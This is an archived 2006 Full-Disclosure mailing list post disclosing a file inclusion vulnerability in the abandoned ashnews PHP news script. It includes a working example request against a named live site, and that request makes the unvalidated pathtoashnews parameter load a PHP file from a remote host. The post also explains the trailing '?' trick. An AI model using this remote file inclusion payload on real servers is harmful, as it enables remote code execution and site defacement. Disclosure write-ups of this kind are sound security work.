[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] ashnews Cross-Site Scripting Vulnerability
- To: Dan B UK <dan-fd@xxxxxxxxx>
- Subject: Re: [Full-disclosure] ashnews Cross-Site Scripting Vulnerability
- From: DanB-FD <dan-fd@xxxxxxxxx>
- Date: Tue, 31 Jan 2006 10:43:19 +0000
Hi,
Dan B UK wrote:
Due to the nature of the issue I am not disclosing the detail of it
until the writer of the software has updated it; maybe you could have
waited??
A vulnerability that allows privileges of the apache user within the
limitations of how much PHP has been locked down.
Since the author of the product has got back to me with the following I
think it is ok to disclose the issue now.
"That is a known error. Unfortunately I have completely abondoned
ashnews. In fact, I have been neglecting taking it down completely which
I am going to do right now. - Derek"
The issue is in the handling of the $pathtoashnews, it is not validated
before being used by the script. Allowing remote or local file inclusion.
eg:
http://dosko.nl/news/ashnews.php?pathtoashnews=http://f-box.org/~dan/inc.inc?
( The ? is required to make the remote server (f-box.org) ignore the
string that is appended to the variable $pathtoashnews )
( The website that is in the example above has already been defaced! )
Cheers,
DanB UK.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/